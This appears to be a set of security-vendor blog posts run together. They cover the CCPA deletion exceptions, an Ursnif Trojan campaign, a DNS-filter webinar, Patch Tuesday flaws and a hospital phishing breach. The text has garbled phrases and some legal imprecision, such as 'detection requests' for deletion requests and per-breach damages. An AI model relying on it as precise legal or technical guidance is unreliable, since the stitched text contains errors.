Under CCPA, Californians can request to have their personal data deleted, but there are CCPA data deletion exceptions you should be aware of. Not all personal data needs to be deleted.
Who Must Comply with CCPA?
The California Consumer Privacy Act gave Californians new rights over their personal data. From January 1, 2020, organizations that conduct business in the state of California are required to comply with CCPA if they have annual gross revenues of more than $25 million, handle the personal data of 50,000 or more consumers, or derive more than 50% of their annual revenue from the sale of personal information.
The CCPA Right to Delete
One of the new rights given to consumers is the right to have their personal data deleted. CCPA applies to personal data that identifies, relates to, describes, or can be associated with an individual or household, directly or indirectly.
When consumers exercise the right to delete, organizations are required to comply within 45 days, but there are CCPA data deletion exceptions. If data is not going to be deleted, the consumer must be informed without unreasonable delay and no later than 45 days after the request has been received. This timescale does not apply to data contained in archive or backup systems. The deletion of personal data stored in an archive or backup can be delayed until the next time the archive or backup is accessed or used.
When a data deletion request is received, an organization must take reasonable steps to verify that the request to delete data has been sent by the individual about whom the data relates. All personal data must then be deleted; however, there are 9 CCPA data deletion exceptions.
CCPA Data Deletion Exceptions
Businesses are not required by law to delete data that is required to perform 9 specific activities:
Data does not need to be deleted if it is required to complete the transaction for which the data was collected or to provide goods or services that have been requested by the consumer. Data does not need to be deleted if it is “reasonably anticipated within the context of a business’s ongoing business relationship with the consumer, or otherwise perform a contract between the business and the consumer.”
If personal data, such as data contained in server logs, is needed to detect security incidents, protect against malicious, deceptive, fraudulent or illegal activity to allow prosecution of the persons responsible for those activities, it should not be deleted.
If personal data is needed to debug or identify and repair errors that impair existing functionality.
While the CCPA helps protect the privacy of consumers, it is secondary to free speech. Personal data does not need to be deleted in order to allow the exercise of free speech, and to ensure the right of another consumer to exercise his or her right of free speech, or to exercise another right provided for by law.
Personal data does not need to be deleted if it is required to ensure compliance with the California Electronic Communications Privacy Act (CalECPA).
Personal data is excepted from deletion if it is required to comply with other legal obligations, such as data retention laws.
Research Conducted in the Public Interest
Personal information of consumers that is used for research conducted in the public interest does not need to be deleted. This includes personal data that is collected and maintained for peer-reviewed, scientific, historical, or statistical research in the public interest if deletion of the data would seriously impair the achievement of the research, provided the consumer has previously provided informed consent for their personal data to be used for research.
Expected Internal Uses
Data is exempt from detection requests if it is required to enable solely internal uses reasonably aligned with the expectations of the consumer based on the consumer’s relationship with the business.
Other Internal Uses
Personal data does not need to be deleted if it is required for other internal uses which, in a lawful manner, are compatible with the context in which the consumer provided their personal data.
Enforcement of CCPA Compliance
The California Attorney General is tasked with enforcing compliance with CCPA and has the authority to issue financial penalties for noncompliance up to $2,500 per violation or $7,500 for an intentional violation. Californian consumers are permitted to take legal action against organizations over data breaches and can claim damages between $100 and $750 per data breach.
In this post we explain the CCPA requirements for businesses and the most important elements of the California Consumer Privacy Act.
What Businesses Must Comply with CCPA?
Unlike the EU’s General Data Protection regulation (GDPR), which applies to all businesses that collect or process the data of EU residents, CCPA only applies to for-profit businesses that meet certain criteria. Any business that meets one or more of the criteria below is required to comply with CCPA.
- Has annual revenues of more than $25 million
- Collects information on 50,000 or more California households or residents each year
- Earns 50% or more of its annual revenue from the sale of the consumer data of California residents
These requirements may be updated or expanded to include a wider range of companies. Make sure you keep up to date with any changes to CCPA if you collect or process the data of U.S consumers.
It is not just companies with a base in California that are required to comply with CCPA. Any company that does business in California or collects or processes the data of California residents is required to comply with CCPA.
What are the CCPA Consumer Rights
CCPA was introduced to give California residents greater control over their personal data.
Consumer rights under CCPA include:
- Right to know what personal data is being collected
- Right to know what personal data is held by a company
- Right to know how personal data is being used by a company
- Restriction of the use and sale of personal data of minors (under 13) without parental consent
- Restriction of the use and sale of personal data of minors (13-16) without direct consent
- Right to delete all personal data held by a company
- Right to opt-out of having personal data sold
- Right to non-discrimination, in terms of price or services, if CCPA rights are exercised
- Right to take legal action against companies for privacy violations and the failure to honor CCPA rights
- Requests from consumers must be confirmed within 10 days and honored within 45 days
Key CCPA Requirements for Businesses
- Businesses must ensure consumers are notified about the collection of their personal data before data is collected and consumers should be given the option of opting out of the collection of their data or the sale of their data. Personal data should only be collected for specific and legitimate purposes.
- Maintain procedures to respond to requests from consumers to access their data, delete their data, and opt out of the sale of their personal information. Procedures must also be developed and maintained relating to the collection and use of the personal information of minors.
- Businesses must offer consumers two methods for consumers to request data and arrange to have their data deleted. One method that is mandatory is a toll-free telephone number. If a business primarily operates online, a web-based method should be offered.
- Any member of staff that handles consumer data must be trained on the requirements of CCPA. Oversight of compliance must be delegated to an individual or team.
- Business must verify the identity of the consumer prior to providing their data or deleting data after a request is received from a consumer.
- CCPA does not go as far as GDPR in terms of data security requirements for businesses. CCPA does not stipulate the security measures that must be implemented to protect consumer data, but it does require businesses to have adequate protections in place to safeguard consumer data, including measures to prevent unauthorized data access. Bear in mind that penalties can be imposed for data breaches and consumers can take legal action over the exposure of their data if the company holding that data has been negligent. Consumer lawsuits can require payment of up to $750 per consumer in the event of a CCPA violation and it is not necessary to provide proof of harm. A large data breach could therefore prove very costly.
How TitanHQ Can Help with CCPA Compliance
TitanHQ offers three solutions that can help with CCPA compliance. SpamTitan Email Security, WebTitan DNS Filtering, and ArcTitan Email Archiving.
- SpamTitan is a powerful email security solution that provides industry leading protection against spam and the leading causes of data breaches – phishing attacks and malware infections.
- WebTitan is a DNS filtering solution that provides an additional level of protection against phishing attacks and malware. WebTitan blocks attempts by network users to access malicious websites such as those used for phishing or malware delivery, thus helping to prevent the exposure of consumer data.
- ArcTitan is an email archiving solution that helps businesses keep email data protected, meet email retention requirements, and quickly find and recover emails when dealing with customer complaints, demonstrating compliance, and for finding and deleting the data of consumers if a request to have data deleted is received.
A new strain of the Ursnif banking Trojan has been identified and the actors to blame for the latest campaign have implemented a new tactic to spread the malware more quickly.
The Ursnif banking Trojan is one of the most often witnessed Trojans. As is the case with other banking Trojans, the purpose of the Ursnif Trojan is to take away credentials such as logins to banking websites, corporate bank details, and credit card information. The stolen credentials are then used to complete financial transactions. It is not unusual for accounts to be drained prior to the transactions being discovered, by which time the funds have cleared, have been withdrawn, and the criminal’s account has been closed. Recovering the stolen funds may not be impossible.
Infection will result in the malware stealing a wide range of sensitive data, capturing credentials as they are typed into the browser. The Ursnif banking Trojan also captures screenshots of the infected device and logs keystrokes. All of that information is silently shared to the hacker’s C2 server.
Banking Trojans can be put in place in a number of ways. They are often installed onto websites where they are downloaded in drive-by attacks. Traffic is sent d to the malicious websites using malvertising campaigns or spam emails contacting hyperlinks. Legitimate websites are compromised using brute force methods, and kits installed on the sites that attack people who have failed to keep their software up to date. In a lot of, software is shared using spam email, hidden in attachments.
Spam email has previously been used to share the Ursnif banking Trojan, and the most recent campaign is no different in that regard. However, the latest campaign uses a new tactic to increase the chance of infection and spread infections more quickly and widely. Financial institutions have been the main target of this banking Trojan, but with this most recent attack method they are far more widespread.
Infection will see the user’s contact list scanned and spear phishing emails sent to each of the user’s contacts. Since the spear phishing emails come from a trusted email account, the chances of the emails being opened is significantly heightened. Simply opening the email will not lead to infection. For that to take place, the recipient must click on the email attachment. Again, since it has come from a trusted person, that is more probably.
The actors to blame for this latest Ursnif banking Trojan campaign have another trick to increase trust and ensure their payload is sent. The spear phishing emails contain message threads from past communications. The email looks like a response to a previous email, and include details of past communications.
A short line of text is included as a attempt to get the recipient to open the email attachment – a Word document including a malicious macro. That macro needs to be authorized to run – if macros have not been set to run automatically, but it will not until the Word document is shut. When the macro is enabled, it initiates PowerShell commands that download the Ursnif Trojan, which then starts logging activity on the infected device and sends further spear phishing emails to the new victim’s contacts.
This is not an original tactic, but it is new to Ursnif – and it is likely to see infections spread much more swiftly. Additionally, the malware incorporates a number of additional tactics to hamper detection, allowing information to be stolen and bank accounts emptied before infection is discovered – the Trojan even erases itself once it has run.
Malware is always changing, and new tactics are constantly created to increase the likelihood of infection. The most recent campaign shows just how important it is to block email threats before they reach end users’ inboxes.
If you use an advanced spam filter like SpamTitan, malicious emails can be blocked to prevent them from reaching end user’s inboxes, greatly reducing the danger posed by malware infections.
There is a cheaper option that Cisco OpenDNS that provides total protection against web-based threats. If you are currently using OpenDNS or have yet to configure a web filtering solution, you can find out about this powerful web filtering solution in a December 5, 2018 webinar.
Cybersecurity solutions can be implemented to secure the network perimeter, but employees often are careless online that can lead to costly data breaches. The online activities of employees can easily lead to in malware, ransomware, and viruses being installed. Staff may also respond to malicious adverts (malvertising) or visit phishing websites where they are relieved of their login details.
Addressing malware infections, solving ransomware attacks, and resolving phishing-related breaches have a negative impact on the business and the resultant data breaches can be incredibly expensive. Due to this, the threat from web-based attacks cannot be disregarded.
Luckily, there is an easy solution that offers protection against web-based threats by carefully managing the web content that their employees can access: A DNS-based web filter.
DNS-based web filtering requires no hardware acquisitions and no software installations. Within around 5 minutes, a business will be able to control employee internet access and block web-based dangers. Some DNS-based web filters such as OpenDNS can be costly, but there is a more cost-effective alternative to Cisco OpenDNS.
TitanHQ and Celestix Networks will be conducting a joint webinar to introduce an alternative to Cisco OpenDNS – The WebTitan-powered solution, Celestix WebFilter Cloud.
Celestix will be implemented by Rocco Donnino, TitanHQ EVP of Strategic Alliances, and Senior Sales Engineer, Derek Higgins who will outline how the DNS-based filtering technology offers total protection from web-based dangers at a fraction of the cost of OpenDNS.
The webinar is at 10:00 AM US Pacific Time on Wednesday December 5, 2018.
Microsoft has addressed 27 critical flaws this Patch Tuesday, including a Microsoft .Net Framework flaw that is being actively exploited to download Finspy surveillance software on devices running Windows 10.
Finspy is genuine software created by the UK-based Gamma Group, which is used by governments globally for cyber-surveillance. The software has been downloaded in at least two attacks in the past few months according to FireEye experts, the most recent attack leveraged the Microsoft .Net Framework flaw.
The attack begins with a spam email including a malicious RTF file. The document uses the CVE-2017-8759 vulnerability to create arbitrary code, which installs and executes a VB script including PowerShell commands, which in turn installs the malicious payload, which includes Finspy.
FireEye suggests at least one attack was completed by a nation-state against a Russian target; however, FireEye experts also believe other actors may also be using the vulnerability to conduct attacks.
According to a blog post last Tuesday, the Microsoft .Net Framework flaw has been detected and mitigated. Microsoft strongly recommends downloading the latest update promptly to minimize exposure. Microsoft says the flaw could permit a malicious actor to take full control of an impacted system.
Many Several Bluetooth flaws were discovered and shared on Tuesday by security company Aramis. The flaws impact billions of Bluetooth-enabled devices around the globe. The eight flaws, referred to as BlueBorne, could be used to carry out man-in-the-middle attacks on devices via Bluetooth, sending traffic to the attacker’s computer. The bugs exist in Windows, iOS, Android and Linux.
In order to target the flaws, Bluetooth would need to be turned for the targeted device, although it would not be necessary for the device to be in discoverable mode. A hacker could use the flaws to connect to a device – a TV or speaker for example – and start a connection to a computer without the user’s knowledge. In order to carry out the attack, it would be necessary to be in relatively close physically to the targeted device.
In addition to intercepting communications, a hacker could also take full management of a device and steal data, download ransomware or malware, or perform other malicious activities such as placing the device on a botnet. Microsoft addressed one of the Bluetooth driver spoofing bugs – CVE-2017-8628 – in the latest round of updates.
One of the most pressing updates is for a remote code execution vulnerability in NetBIOS (CVE-2017-0161). The vulnerability impacts both servers and work devices. While the vulnerability is not thought to be currently exploited in the wild, it is of note as it can be exploited just by sending specially crafted NetBT Session Service packets.
The Zero Day Initiative (ZDI) said the flaw “is practically wormable within a Local Area Network. This could also target many virtual clients if the guest OSes all connect to the same (virtual) LAN.”
Overall, 81 updates have been published by Microsoft this Patch Tuesday. Adobe has addressed eight flaws, including two critical memory corruption bugs (CVE-2017-11281, CVE-2017-11282) in Flash Player, a critical XML parsing flaw in ColdFusion (CVE-2017-11286) and two ColdFusion remote code execution flaws (CVE-2017-11283, CVE-2017-11284) relating to deserialization of untrusted data.
In the United States, healthcare industry phishing campaigns have been to blame for exposing the protected health records of well in excess of 90 million Americans over the course of the past year. That’s more than 28% of the population of the United States.
This week, another case of healthcare sector phishing has come to light following the announcement of Connecticut’s Middlesex Hospital data breach. The hospital saw that four of its employees responded to a phishing email, resulting in their email account login details being sent to a hacker’s command and control center. In this case the damage inflicted by the phishing attack was limited, and only 946 patients had their data exposed. Other healthcare groups have not been nearly so fortunate.